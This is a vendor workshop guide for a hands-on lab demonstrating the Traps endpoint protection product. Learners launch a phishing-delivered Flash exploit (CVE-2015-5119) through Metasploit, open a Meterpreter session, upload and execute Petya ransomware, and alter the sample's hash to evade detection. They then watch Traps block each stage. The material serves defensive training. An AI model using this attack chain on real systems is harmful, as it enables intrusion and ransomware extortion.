Академический Документы
Профессиональный Документы
Культура Документы
ULTIMATE
TEST DRIVE:
Advanced Endpoint Protection
Workshop Guide
UTD-AEP 2.2 © 2017 Palo Alto Networks, Inc. | Confidential and Proprietary 20171117
Ultimate Test Drive - Advanced Endpoint Protection
Table of Contents
UTD-AEP 2.2 2
Ultimate Test Drive - Advanced Endpoint Protection
UTD-AEP 2.2 3
Ultimate Test Drive - Advanced Endpoint Protection
Note: This workshop covers only basic topics and is not a substitute for training classes conducted by
Palo Alto Networks Authorized Training Centers (ATC). Please contact your partner or regional sales
manager for more information on available training and how to register for one near you.
UTD-AEP 2.2 4
Ultimate Test Drive - Advanced Endpoint Protection
UTD-AEP 2.2 5
Ultimate Test Drive - Advanced Endpoint Protection
Once the environment has been created, the system will display a welcome page. Click “Start Using This
Environment” to begin using the environment.
This will display a list of all virtual systems that constitute the UTD environment.
Take note of the “Shortcut Menu” at the top of your browser window. You will use this Shortcut Menu
throughout the workshop to switch between the available desktops.
UTD-AEP 2.2 6
Ultimate Test Drive - Advanced Endpoint Protection
D. Victim Client: This virtual system is identical to the Traps Client system with one exception: it is not
equipped with Traps. You will use this system as the victim of the ransomware attack in our workshop.
E. VM-Series Security Platform: This system is a Palo Alto Networks virtual next-generation firewall.
Review the diagram below to better understand the UTD environment setup.
UTD-AEP 2.2 7
Ultimate Test Drive - Advanced Endpoint Protection
Note: By default, the various desktops used in this UTD rely on RDP connections over HTML 5 protocol
through the browser. A HTML5 compatible browser is required.
If you encounter connection issues with any of the desktop interfaces, click the “Reconnect” link in the left-
hand pane of the desktop display to re-establish your connection.
If reconnection to the environment remains unsuccessful, please inform the instructor for further assistance.
End of Activity 1
UTD-AEP 2.2 8
Ultimate Test Drive - Advanced Endpoint Protection
To complete the first phase of the attack, you will use the Metasploit tool hosted on the Attacker workstation to
prepare a webserver that delivers an exploit to the victim. When the victim clicks a link in a phishing email, he
or she is redirected to the Attacker’s website, where a zero-day Flash Player exploit (CVE-2015-5119)
compromises the victim’s endpoint system.
Once the victim’s system is compromised, the Attacker uploads the ransomware malware to the victim’s
machine and executes it. This process is depicted in the figure below.
UTD-AEP 2.2 9
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Attacker” link on the Shortcut Menu that lists the available desktop environments in the UTD.
Note: If the Attacker VM GUI is slow, see Appendix 2 for an alternative access method.
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. This process may take a while, so please be patient.
When Metasploit has completed loading, it should display the following prompt:
“msf exploit(adobe_flash_hacking_team_uaf) >”
The attacker system is now ready and online, waiting for a connection from the victim system.
Note: If using a non-US keyboard layout, you may use the “Virtual Keyboard” in the left-hand pane to send
text.
UTD-AEP 2.2 10
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Victim Client” link on the Shortcut Menu that lists the available desktop environments in the UTD.
Note: You should not need the credentials for the user associated with the Victim Client. However, if
the system does present you with a login screen on the Victim Client, click the icon associated with the
user “Jen” and supply the password associated with that user (shown above the desktop display area).
This password is “Password1”.
UTD-AEP 2.2 11
Ultimate Test Drive - Advanced Endpoint Protection
Microsoft Outlook is already open and running on the desktop. An email with the subject line: “Someone has
your password” is selected and displayed in the preview pane.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login page.
UTD-AEP 2.2 12
Ultimate Test Drive - Advanced Endpoint Protection
Click inside the Terminal window that is open on the desktop. Then, press the “enter/return” key a few times to
get a new Metasploit prompt.
Note: If your connection to the Attacker desktop has been severed, click the “Reconnect” link in the left-
hand pane of the desktop display area to re-establish your connection to that environment.
If you see the lock screen, click in that window and hit the Enter/Return key to get a login prompt.
UTD-AEP 2.2 13
Ultimate Test Drive - Advanced Endpoint Protection
In the Terminal window on the Attacker’s desktop, type the following command to verify that you have an
active Meterpreter session to the Victim Client system:
sessions
This will display a list of all active sessions currently running within Metasploit.
An open session indicates that the Attacker has an active, direct connection to the Victim Client, which he or
she can use to further compromise the system.
Note the “ID” of the active session connected to the Victim Client. This is the “Session ID” that you will need to
enter in the next step; it should be session #1, although that might not be the case if you refreshed the
browser on the Victim Client desktop at any point.
Initiate an interactive session with the Victim Client by entering the following command at the Metasploit
prompt (if the “Session ID” your noted in the previous step was not “1,” remember to substitute your “Session
ID” for the number “1” in this command):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected to the Victim Client and can execute any number of available commands to
exploit the system. To see a list of available commands, simply type “?” and press “enter/return” at the
Meterpreter prompt.
We will not explore the available Meterpreter commands in this exercise, but feel free to scroll up and down
the list to see the available commands. These include commands such as: reboot, shutdown, and
keyscan_start (a keylogger), among others.
UTD-AEP 2.2 14
Ultimate Test Drive - Advanced Endpoint Protection
The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Victim Client by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Victim Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our ransomware attack and infect the Victim Client.
Be prepared to switch to the tab for the Victim Client as soon as you enter the following command at the
Meterpreter prompt (in the Attacker Terminal window):
execute -f happy.exe -H
UTD-AEP 2.2 15
Ultimate Test Drive - Advanced Endpoint Protection
The ransomware will simulate the process of checking the disk on the Victim Client (the CHKDSK process).
However, the counter that indicates the progress will never stop counting.
Click the “Send ctrl+alt+delete” button in the left-hand pane of the Victim Client desktop display to send that
key sequence to the system.
UTD-AEP 2.2 16
Ultimate Test Drive - Advanced Endpoint Protection
This will display a flashing red and grey “skull and cross bone” image and prompts the user to “PRESS ANY
KEY.”
Click inside the “skull and cross bone” image and press the space bar. This should change the image to a
ransomware warning page, with demands and instructions to submit your payment in order to unlock your
system.
Congratulations! You are simultaneously and attacker and your own victim.
On the Attacker desktop, click inside the Terminal window and press the “enter/return” key a few times to
display a Metasploit prompt.
UTD-AEP 2.2 17
Ultimate Test Drive - Advanced Endpoint Protection
We no longer need this attacker session, so type the following command to shut down Meterpreter:
exit
This will return you to the Metasploit prompt. Type the following command to shut down Metasploit as well.
exit
This will stop the attacker server and return you to the Terminal prompt.
End of Activity 2
UTD-AEP 2.2 18
Ultimate Test Drive - Advanced Endpoint Protection
Click the Traps icon on the Windows taskbar at the bottom of the desktop. This should display the Traps client
console, which indicates that “Advanced Endpoint Protection is Enabled”
Note the date and time of the “Last Check-in” indicated on the bottom of the Traps client console.
Click the “Check In Now” link to reconnect to the Traps Endpoint Security Manager (ESM) backend systems
and retrieve any updated security policies.
The link should change momentarily to “Connecting” and once the Traps client has completed the check-in
process, it should return to “Check In Now.”
UTD-AEP 2.2 19
Ultimate Test Drive - Advanced Endpoint Protection
At this point, you have verified that Traps is running on the Client desktop.
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. When Metasploit has completed loading, it should display the following
prompt
The attacker system is now ready and online, waiting for a connection from the victim system.
UTD-AEP 2.2 20
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Traps Client” tab to display that desktop. This returns you to the Traps Client desktop with the Traps
client console still visible (from Task 1, Step 2 above).
Microsoft Outlook is already open and running, and an email with the subject line: “Someone has your
password” is displayed in the inbox.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login website.
Recall from our previous Activity that the Attacker server detects the incoming connection and serves the
SWF file for the Hacking Team zero-day exploit in reply to the request.
At this point, Traps will detect the exploitation attempt, block it, and display a dialog box to inform you that it
has prevented the security breach.
UTD-AEP 2.2 21
Ultimate Test Drive - Advanced Endpoint Protection
Traps freezes the Internet Explorer processes running in the browser tab, collects forensic data about the
attack, and then terminates the exploitation attempt.
Click “OK” in the Traps notification dialog box to dismiss it. This will close the dialog box and terminate the
Internet Explorer process that was targeted by the exploitation attempt.
Click the “Attacker” tab. This should display the Attacker desktop.
Notice that the Attacker’s system has detected the incoming request, served the SWF file that contains the
exploit, but failed to establish an active session to the Trap Client machine.
Click inside the Terminal window on the Attacker desktop and press “enter/return” a few times to get a new
Metasploit prompt: “msf exploit (adobe_flash_hacking_team_uaf) >.”
Enter the following command at the Metasploit prompt:
sessions
This should display a response indicating that there are no active sessions.
This verifies that the Attacker’s exploitation attempt failed, despite the fact that the SWF file containing the
Hacking Team Flash zero-day exploit was delivered to the Traps Client machine.
End of Activity 3
UTD-AEP 2.2 22
Ultimate Test Drive - Advanced Endpoint Protection
Click the “ESM Server” link on the Shortcut Menu that lists the available desktop environments in the UTD.
This will display the ESM Server desktop. The Chrome browser should already be open and displaying the
login prompt for the ESM management console.
If Chrome is not open, simply click the Chrome icon in the Windows Taskbar (on the left of the display) to
launch Chrome. If necessary, click the “ESM Server-Login” shortcut on the Chrome bookmark bar to access
the login prompt.
UTD-AEP 2.2 23
Ultimate Test Drive - Advanced Endpoint Protection
This should log you in to the console and display the main dashboard.
Click the “Security Events” tab inside the ESM console. This should display a table that summarizes all the
threats reported to the ESM by all endpoint agents.
In the case of our UTD environment, we should only have one security event reported: and exploit prevention
listed in the row labeled “Exploits.”
At this point, you can simply click the number in the summary table (the red number “1” in our case) to
navigate directly to the exploit prevention event.
Click “Exploits” in the left column of the display, under the “Preventions” heading. This will display all the
exploit prevention events recorded in the ESM.
UTD-AEP 2.2 24
Ultimate Test Drive - Advanced Endpoint Protection
Notice that you can learn a great deal from the record displayed in the table, even without opening the event
record itself:
• Date and time of the event
• Which computer was affected (Traps Client)
• The IP address of the user
• Who the user was (user Jen on Traps Client)
• What operating system is running on the system (Windows 7)
• What version of the Traps agent is running on the system
• Which process was exploited (iexplore.exe - Internet Explorer)
• What exploit prevention module in Traps prevented the exploitation attempt
Click the record in the table that corresponds to our exploit prevention event. This will display additional details
about the prevention event, including:
• Source Path: the path to the application that was exploited
• Source Version: the version number of the application
• File Quarantine: whether the executable file (iexplore.exe) was quarantined
• Source Signers: who (if any) signed the executable file
UTD-AEP 2.2 25
Ultimate Test Drive - Advanced Endpoint Protection
Note that you can also display additional details about the prevention event by clicking the “Additional
Information” in the prevention event record display. Click that link now.
Scroll down in the list of “Recent Files and URIs” and take note of the files and web addresses that were
associated with this ransomware attack. Specifically, notice the web address for the “Attacker” system
displayed in this list (“http://192.168.21.150:8080”). This type of information is critical to forensic investigations,
should you choose to conduct one after Traps prevents an attack.
UTD-AEP 2.2 26
Ultimate Test Drive - Advanced Endpoint Protection
Traps provides several malware prevention methods, each of which includes multiple, purpose-built
prevention techniques that are tuned for maximum performance and accuracy.
Please refer to the overview presentation that your workshop instructor delivered for an in-depth discussion of
each malware prevention capability.
Click the “Policies” tab inside the ESM console. This should display a table that summarizes the policies
configured in the ESM. You can display the policies for each of “Exploit,” “Malware,” and “Forensics”
capabilities by clicking on the associated link in the column on the left of this display.
Click the “WildFire” link under the “Malware” heading in the left column. This will display a table containing the
default policies for WildFire.
UTD-AEP 2.2 27
Ultimate Test Drive - Advanced Endpoint Protection
Next, click the “WildFire On” policy in the table, which is the second policy in the list. This will display a
summary of the settings of the policy.
Click the “Edit” button to see how these settings are specified (and modified) in the policy. This will display the
policy settings overlay window.
Feel free to click the other tabs in this display (“Conditions,” “Objects,” and “Name”) to see the additional
conditions and settings that you could specify for each policy of this type.
When you have finished looking at the policy settings, click “Cancel” to close the window.
UTD-AEP 2.2 28
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Restrictions” link under the “Malware” heading in the left column. This will display a table containing
the Execution Restrictions policies defined in the ESM.
Click the first item in the table, which is a policy named “Prevent Execution from Temp Folders.” This will
expand the display and show you additional details about the specific restrictions included in this policy.
This policy only includes local folder restrictions, but you can specify many other restrictions. Click the “Edit”
button in the policy details view. This will display the “Restrictions” edit window.
Note the various restrictions that you can specify with policies such as this one; they are listed on the left of
the edit window. Click through them to better understand what restrictions are available.
When you have finished reviewing the policy settings, click “Cancel” to close the window.
UTD-AEP 2.2 29
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Hash Control” link under the “Malware” heading in the left column. This will display a table that lists
all recent file executions (such as “iexplore.exe” and “taskhost.exe”), their hash values, associated WildFire
verdicts, and other relevant information that define the Admin Override Policies in the ESM. You might need to
change the “First Seen” / “after” search parameter to “First Seen” / “before” to see more entries (click “Search”
on the left to apply the filter).
Click the first item in the table. This will expand the display and show you additional details about the specific
executable file. Notice the buttons in this expanded display that allow you to override or specify any of the
following actions for each executable (due to limitations of the CloudShare environment, you may need to use
the right-arrow key on your keyboard to scroll the display to the right to see all available options):
• Treat as Benign
• Treat as Malware
• WildFire Report
• Recheck Verdict
• Report as Incorrect
UTD-AEP 2.2 30
Ultimate Test Drive - Advanced Endpoint Protection
Similar to its malware prevention capabilities, Traps provides several exploit prevention methods, each of
which includes multiple, purpose-built prevention techniques that are tuned for maximum performance and
accuracy.
Please refer to the overview presentation that your workshop instructor delivered for an in-depth discussion of
each exploit prevention capability.
Click the “Application Protection Modules” link under the “Exploit” heading in the left column. This will display a
table containing the default exploit prevention policies included with Traps.
This is also where all custom exploit prevention policies will be listed (we will return to this table in a future
Activity).
Click the first policy in the list, labeled “Test Exploit Protection Rule.” This will expand the display and show
additional details about this particular policy.
Click the “Edit” button in the expanded display. This will display the “Exploit Protection Rule” edit window.
Note the various Exploit Protection Modules (EPMs) that correspond to the Traps exploit prevention methods;
they are listed in a list on the left of this edit window.
UTD-AEP 2.2 31
Ultimate Test Drive - Advanced Endpoint Protection
Flip through the remaining tabs in the edit window to see the additional settings that you can specify for each
exploit prevention policy.
When you have finished viewing the policy settings, click “Cancel” to close the window.
End of Activity 4
UTD-AEP 2.2 32
Ultimate Test Drive - Advanced Endpoint Protection
Step 1. Access the Traps Client Desktop and Verify Traps is Enabled
You have now verified that Traps is running on the Traps Client desktop.
Click the “Attacker” tab. This should display the Attacker Desktop.
There should be a terminal window already open on the desktop, with Metasploit loaded and displaying the
following prompt
“msf exploit(adobe_flash_hacking_team_uaf) >”
UTD-AEP 2.2 33
Ultimate Test Drive - Advanced Endpoint Protection
Click inside the terminal window to activate it. Then press the “enter/return” key a few times to ensure the
Metasploit system is running. If it is not, please reconnect to the Attacker desktop.
At this point, the attacker system is ready and online, waiting for a connection from the victim system.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop with the
Traps client console still visible.
This Step repeats the same sequence of actions you completed to trigger the exploitation of the Victim Client
in the previous Activity. This is necessary to observe Traps in action.
Click the Outlook application window to activate it. The email with the subject line: “Someone has your
password” is displayed in the inbox.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login website.
UTD-AEP 2.2 34
Ultimate Test Drive - Advanced Endpoint Protection
At this point, Traps will detect the exploitation attempt, block it, and display a dialog box to inform you that it
has prevented the security breach.
Click “OK” in the Traps notification dialog box to dismiss it. This will close the dialog box and terminate the
Internet Explorer process that was targeted by the exploitation attempt.
Click the first item in the list, which should be associated with “Traps Client” system, “iexplore.exe” process,
and “DLL Security” module. This will display an expanded view of the security event.
Now click the “Create Rule” button. This will display the “Exploitation Protection Rule” edit window and
automatically fill in the necessary information from the security event to create a policy that disables the EPM
(DLL Security, in this case).
UTD-AEP 2.2 35
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Name” tab in the “Exploit Protection Rule” edit window and take note of the name that is
automatically assigned to this new Policy.
Next, click “Apply” to create and activate this new policy rule. This disables the DLL Security EPM for the
“iexplorer.exe” process on the “Traps Client” system.
Verify this rule has been created by clicking the “Policy” tab in the ESM console display. By default, this will
display the Application Protection Modules under the “Exploit” heading of the left navigation column.
Note that the first policy in this table has the following specifications:
• ID: A unique policy identifier assigned to this new policy
• Name: “Exploitation policy from Prevention on Traps Client”
• Description: “DLL Security on iexplore.exe is disabled where Traps Client included”
Be sure to note the ID of this new policy. You will use this information in the next Step.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the icon for Traps in the Windows Taskbar (bottom of the display) to open the Traps client console.
Finally, click the “Check In Now” link on the bottom of the Traps console window to retrieve the policy we just
created in the previous step from the ESM Server.
Once the check-in process is completed, click the “Advanced” link to the right of the “Status” tab on the top
portion of the Traps console window. This will display several additional tabs. Click the “Policy” tab and verify
UTD-AEP 2.2 36
Ultimate Test Drive - Advanced Endpoint Protection
that the new EPM policy that you created in the previous Step has been applied to the Traps client. The ID
associated with this policy should match the one you noted in the previous Step.
Click “OK” in the Traps prevention alert window to dismiss it. This will also terminate the Internet Explorer
process, as expected.
UTD-AEP 2.2 37
Ultimate Test Drive - Advanced Endpoint Protection
Click the first item in the list, which should be associated with “Traps Client” system, “iexplore.exe” process,
and “ROP Mitigation” module. This will display an expanded view of the security event.
Now click the “Create Rule” button. This will display the “Exploitation Protection Rule” edit window and
automatically fill in the necessary information from the security event to create a policy that disables the EPM
(ROP Mitigation, in this case).
Simply click “Apply” to create and activate this new policy rule. This disables the ROP Mitigation EPM for the
“iexplorer.exe” process on the “Traps Client” system.
Verify this rule has been created by clicking the “Policy” tab in the ESM console display. By default, this will
display the Protection Modules under the “Exploit” heading of the left navigation column.
Note that the first policy in this table has the following specifications:
• Name: “Exploitation policy from Prevention on Traps Client”
• Description: “ROP Mitigation on iexplore.exe is disabled where Traps Client included”
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the icon for Traps in the Windows Taskbar (bottom of the display) to open the Traps client console.
The “Policy” tab should be visible (recall that we displayed this tab by clicking the “Advanced” link adjacent to
the “Status” tab in previous Steps).
Finally, click the “Check In Now” link on the bottom of the Traps console window to retrieve the policy we just
created in the previous step from the ESM Server.
UTD-AEP 2.2 38
Ultimate Test Drive - Advanced Endpoint Protection
Verify that the new EPM policy that you created in the previous Step has been applied to the Traps client.
Notice how the policy name is the same as the one we created in our previous Steps. Ideally, an administrator
would provide a more descriptive name instead of the default name assigned by the system in order to
distinguish policies from one another. We will do that in the next step.
Click “OK” in the Traps prevention alert window to dismiss it. This will also terminate the Internet Explorer
process, as expected.
UTD-AEP 2.2 39
Ultimate Test Drive - Advanced Endpoint Protection
Click the first item in the list, which should be associated with “Traps Client” system, “iexplore.exe” process,
and “JIT Mitigation” module. This will display an expanded view of the security event.
Now click the “Create Rule” button. This will display the “Exploitation Protection Rule” edit window and fill in
the necessary information from the security event to disable the EPM (JIT Mitigation, in this case).
Click the “Name” tab in the edit window. This will display the “Rule Summary” area. Replace the name for this
rule with “Disable JIT Mitigation on Traps Client.”
Then click “Apply” to create and activate this new policy rule. This disables the JIT Mitigation EPM for the
“iexplorer.exe” process on the “Traps Client” system.
Verify this rule has been created by clicking the “Policy” tab in the ESM console display. By default, this will
display the Protection Modules under the “Exploit” heading of the left navigation column.
Note that the first policy in this table has the following specifications:
UTD-AEP 2.2 40
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the icon for Traps in the Windows Taskbar (bottom of the display) to open the Traps client console.
The “Policy” tab should be visible (recall that we displayed this tab by clicking the “Advanced” link adjacent to
the “Status” tab in previous Steps).
Finally, click the “Check In Now” link on the bottom of the Traps console window to retrieve the policy we just
created in the previous step from the ESM Server.
Verify that the new EPM policy that you created in the previous Step (“Disable JIT Mitigation on Traps Client”)
has been applied to the Traps client.
End of Activity 5
UTD-AEP 2.2 41
Ultimate Test Drive - Advanced Endpoint Protection
UTD-AEP 2.2 42
Ultimate Test Drive - Advanced Endpoint Protection
Click inside the terminal window to activate it. Then press the “enter/return” key a few times to get a Metasploit
prompt:
At the Metasploit prompt, type the following command to verify that you have an active Meterpreter session to
the Victim Client system:
sessions
This will display a list of all active sessions currently running within Metasploit.
Note the “ID” of the active session with the Traps Client. We will use session ID #1 for the instructions below,
but you should use the number that corresponds to your session ID.
UTD-AEP 2.2 43
Ultimate Test Drive - Advanced Endpoint Protection
Initiate an interactive session with the Traps Client by entering the following command at the Metasploit
prompt (assuming your session ID is 1):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected with the Traps Client and can now upload your ransomware sample to that
system.
The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Traps Client by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our ransomware attack and infect the Traps Client.
UTD-AEP 2.2 44
Ultimate Test Drive - Advanced Endpoint Protection
At this point, Meterpreter should indicate that a new process was created and executed on the target system,
Traps Client.
Click the “Traps Client” tab. This should display the Traps Client desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
The “Prevention Description” field should indicate Traps blocked this based on a “Suspicious process
detected”. Click the “Show Details” button then scroll down to the bottom of the list. You will notice the
“Component” referenced here is “WildFire”
If you recall our review of the sequence of prevention methods in Task 1 of this Activity, Traps has already
conducted the following prevention checks to arrive at this point:
1. Admin Override Policy: None exists, so Traps proceeded to the next step.
2. Trusted Publisher Identification: This executable is not signed, so Traps proceeded to the next step.
3. WildFire Check: This malware is already known to WildFire (as identified by its file hash), so Traps
blocked it.
4. Quarantine: Since the executable file was a known malware, Traps quarantined the file.
UTD-AEP 2.2 45
Ultimate Test Drive - Advanced Endpoint Protection
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that in the “Details” window, it indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Since this malware has a file hash that is identified as a known malware in the WildFire threat intelligence
cloud (and now in the local cache of this Traps agent and the ESM), Traps will block it every time it attempts
to run.
In order to see the local Static Analysis prevention method, we need to create a malware sample with a file
hash that is unknown to both Traps and WildFire.
Note: If accessing the Attacker VM via SSH, return to Appendix 2 for additional steps.
In the new Terminal window, type the following command to get a listing of all files in the root directory:
ls
The file “hashchange.sh” will be listed among the files on the root user’s home directory.
In the new Terminal window, type the following command to modify the file hash for the “happy.exe”
ransomware sample:
UTD-AEP 2.2 46
Ultimate Test Drive - Advanced Endpoint Protection
./hashchange.sh
This will display the 64-character hash value of the file “happy.exe,” add a small segment of random data to
the end of the file, and display the new hash value for the modified file. Note the difference between the hash
values before and after the change.
This malware file is now essentially unknown to Traps and WildFire because it has a new file hash.
In the Attacker desktop window, click inside the initial terminal window that still displays the Meterpreter
prompt (“meterpreter >”). This window should still be visible under the new Terminal window that you used in
the previous Task to modify the ransomware sample.
Upload the modified ransomware sample you created in the previous Task to the Traps Client by typing the
following commands at the Meterpreter prompt:
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps Client.
UTD-AEP 2.2 47
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Traps Client” tab. This should display the Traps Client desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
The “Prevention Description” field should again indicate Traps blocked based on a “Suspicious process
detected”. Click the “Show Details” button then scroll down to the bottom of the list. You will notice the
“Component” referenced here this time is “Local Analysis”
If you recall our review of the sequence of prevention methods in Task 1 of this Activity, Traps has already
conducted the following prevention checks to arrive at this point:
1. Admin Override Policy: None exists, so Traps proceeded to the next step.
2. Trusted Publisher Identification: This executable is not signed, so Traps proceeded to the next step.
3. WildFire Check: This malware is unknown to WildFire (as identified by its file hash), so Traps
proceeded to the next step.
4. Static Analysis: Static analysis correctly identifies this new malware sample as malicious and blocks
its execution.
5. Quarantine: Since the executable file was identified as malware, Traps quarantined the file.
6. Upload to WildFire for Analysis: Since the executable is unknown to WildFire, Traps uploaded it to
WildFire for full analysis.
If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window. This will display all recent security events
recorded on this system.
UTD-AEP 2.2 48
Ultimate Test Drive - Advanced Endpoint Protection
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Local Analysis Module) and
terminated the process.
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that the “Details” window indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Click the “ESM Server” tab to access that desktop environment. This should display the ESM Server console.
Note: Since we have not used this environment for some time now, it is possible that the CloudShare
system has disconnected your session. If you realize that the environment does not respond to your
mouse clicks or keystrokes at this point, simply click the “Reconnect” button in the left-hand pane. That
will reconnect you to the ESM Server system.
In the ESM Server console, click the “Policies” tab. This will display the Exploit Protection Modules (by
default).
In the left navigation area, click the “Hash Control” link under the “Malware” heading. This will display a table
of all executable files that have been run on the endpoints connected to the ESM Server, along with their
respective verdicts.
Notice “happy.exe” among the first few entries in this table, along with its (new) hash and a verdict of malware
(indicated by the red “X”) obtained via Local Analysis (another name for Static Analysis). Also note that the
ESM is uploading this malware to WildFire, as indicated by the icon under the “Upload Status” column in the
table.
UTD-AEP 2.2 49
Ultimate Test Drive - Advanced Endpoint Protection
This upload process occurs without delay in production environment deployments. However, in the bandwidth-
limited CloudShare environment, the upload process may take some time.
Once the upload has been completed, WildFire will analyze the unknown malware sample, render a verdict,
and transmit that verdict back to the ESM Server. The updated verdict will then be visible in this table.
In the ESM Server console, click the “Policies” tab, followed by the “WildFire” link under the “Malware”
heading in the left column navigation area. This will display the list of WildFire policies currently configured on
the ESM.
Click the second entry in the table (the policy named “WildFire On”) to display its expanded information area.
Notice the policy settings that are visible in this view:
• WildFire activation is on: Traps will check unknown executables with WildFire for a verdict
• Action is prevention: Traps will prevent unknown executables that are deemed to be malicious
UTD-AEP 2.2 50
Ultimate Test Drive - Advanced Endpoint Protection
• Action is applied on grayware: Traps will apply the prevention action to grayware as well
• User alert is on: Traps will alert the user when an unknown executable is prevented from running
• Upload file for WildFire analysis is enabled: Traps will upload unknown executables to WildFire for
analysis
• Local analysis is enabled: Traps will examine unknown executables with its local, static analysis
engine
• Quarantine files is enabled: Traps will quarantine files that are deemed to be malicious
Click the “Edit” button to modify this policy. This will display the WildFire policy editor window, with the
“Settings” tab visible. From the “WildFire Activation” drop-down, select the “Off” option. This will disable
WildFire, Static Analysis, and Quarantine features of Traps.
Next, click the “Name” tab in the same editor window to display the name that is automatically assigned to this
policy (“WildFire On”).
Change the name of the policy to “WildFire is Off” in the text box labeled “Fill in the rule name” and click the
“Apply” button to save your changes.
This will return you to the list of WildFire policies currently configured on the ESM.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
The Traps client console should already be visible. Otherwise, click the Traps icon in the Windows Taskbar
UTD-AEP 2.2 51
Ultimate Test Drive - Advanced Endpoint Protection
You may notice that a message pops up on the Windows desktop indicating that virus protection has been
disabled. This is due Traps being able to register with Microsoft Security Center as an official Anti-virus
product.
UTD-AEP 2.2 52
Ultimate Test Drive - Advanced Endpoint Protection
Now upload the modified ransomware sample you created in the previous Task to the Traps Client by typing
the following commands at the Meterpreter prompt:
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps Client.
Click the “Traps Client” tab. This should display the Traps Client desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
The “Prevention Description” field indicates that Traps blocked an “Attempted execution from a restricted
folder.”
If you recall our review of the Execution Restrictions policies through the ESM Server console (Activity 4, Task
3, Step 3), Traps was programmed to prevent execution of programs from the “C:\Temp” directory. This is
precisely what happened in this Step.
Click “OK” to dismiss the alert window.
If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window. This will display all recent security events
recorded on this system.
UTD-AEP 2.2 53
Ultimate Test Drive - Advanced Endpoint Protection
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Execution Protection
Module) and terminated the process.
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that the “Details” window indicates that Traps did not quarantine the malware (as shown by the entry
“Quarantine: No”), because it was not specifically identified as malware.
Close Internet Explorer, and Outlook by clicking the “X” on the top-right corner of each window.
Click the “Attacker” tab to display that desktop environment.
Next, click inside the Terminal window that should still be displaying the Meterpreter prompt (“meterpreter >”).
Hit the “enter/return” key a few times to display a new prompt. The Meterpreter session should have
automatically terminated (since you shut down Internet Explorer in the Traps Client environment).
At the Metasploit prompt (“msf exploit(adobe_flash_hacking_team_uaf) >”), type the following commands,
hitting the “enter/return” key after each:
exit
clear
End of Activity 6
UTD-AEP 2.2 54
Ultimate Test Drive - Advanced Endpoint Protection
In the last set of tasks of the previous Activity, you used a command line tool to modify the ransomware
executable “happy.exe” to create a new malware with a file hash that was unknown to both Traps and
WildFire.
UTD-AEP 2.2 55
Ultimate Test Drive - Advanced Endpoint Protection
The local Static Analysis check in Traps correctly blocked this newly modified ransomware, quarantined the
file, and transmitted the file to WildFire for full analysis.
Click the “ESM Server” tab to access that desktop environment. This should display the ESM Server console.
Note: Since we have not used this environment for some time now, it is possible that the CloudShare
system has disconnected your session. If you realize that the environment does not respond to your
mouse clicks or keystrokes at this point, simply click the “Reconnect” button in the left-hand pane. That
will reconnect you to the ESM Server system.
In the ESM Server console, click the “Policies” tab. This will display the Exploit Protection Modules (by
default).
In the left navigation area, click the “Hash Control” link under the “Malware” heading. This will display a table
